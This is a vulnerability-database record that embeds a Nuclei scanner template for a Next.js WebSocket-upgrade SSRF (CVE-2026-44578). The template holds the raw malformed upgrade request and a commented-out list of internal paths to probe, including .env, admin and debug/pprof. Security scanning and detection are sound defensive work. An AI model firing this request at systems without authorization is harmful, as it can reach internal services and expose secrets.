{"uuid": "70e7de3e-365c-4bc6-bc42-e5d33f01458b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-44578", "type": "seen", "source": "https://gist.github.com/hahwul/e82a1e91f75872e43287743d4a15d035", "content": "id: nextjs-websocket-upgrade-ssrf-ghsa-c4j6\n\ninfo:\n  name: Next.js WebSocket Upgrade SSRF (GHSA-c4j6-fc7j-m34r / CVE-2026-44578)\n  author: hahwul\n  severity: high\n  description: |\n    Detects Next.js instances vulnerable to SSRF via malformed WebSocket upgrade \n    request with absolute-form request-URI[](http:///).\n    \n    The vulnerable resolveRoutes + upgrade handler collapses // and proxies to \n    localhost:80/443. Response starting with \"HTTP/1.\" or containing \n    \"Internal Server Error\" indicates the SSRF path was triggered.\n    \n    Affected versions: next >=13.4.13 <15.5.16, >=16.0.0 <16.2.5\n    \n    Note: Front-end proxies (nginx/Apache/CDN) may return similar errors \n    for absolute-URI requests, causing false positives. Use the original \n    Python verifier (verify_ghsa_c4j6.py) with control probe for accurate \n    in-band confirmation.\n  reference:\n    - https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\n  tags: cve,cve2026,nextjs,ssrf,websocket,intrusive\n\nvariables:\n  # \uae30\ubcf8 \ud14c\uc2a4\ud2b8 \uacbd\ub85c (\ud544\uc694\uc2dc -var path=xxx \ub85c override)\n  path: \"x\"\n\nrequests:\n  - raw:\n      - |\n        GET http:///{{path}} HTTP/1.1\n        Host: {{Hostname}}\n        Connection: Upgrade\n        Upgrade: websocket\n        Sec-WebSocket-Version: 13\n        Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\n\n    # \uc5ec\ub7ec \uacbd\ub85c\ub97c \ud55c \ubc88\uc5d0 \ud14c\uc2a4\ud2b8\ud558\uace0 \uc2f6\uc744 \ub54c \uc544\ub798 payloads \uc8fc\uc11d \ud574\uc81c\n    # payloads:\n    #   path:\n    #     - x\n    #     - \"\"\n    #     - healthz\n    #     - status\n    #     - metrics\n    #     - actuator/health\n    #     - admin\n    #     - .env\n    #     - server-status\n    #     - stub_status\n    #     - nginx_status\n    #     - wp-login.php\n    #     - api/v1\n    #     - debug/pprof\n    #     - _next/static\n\n    matchers:\n      - type: regex\n        regex:\n          - '^HTTP/1\\.[0-9] '\n        part: raw\n      - type: word\n        words:\n          - \"Internal Server Error\"\n        part: body\n    matchers-condition: or\n\n    redirects: false\n    max-redirects: 0\n    threads: 10", "creation_timestamp": "2026-05-15T00:16:17.000000Z"}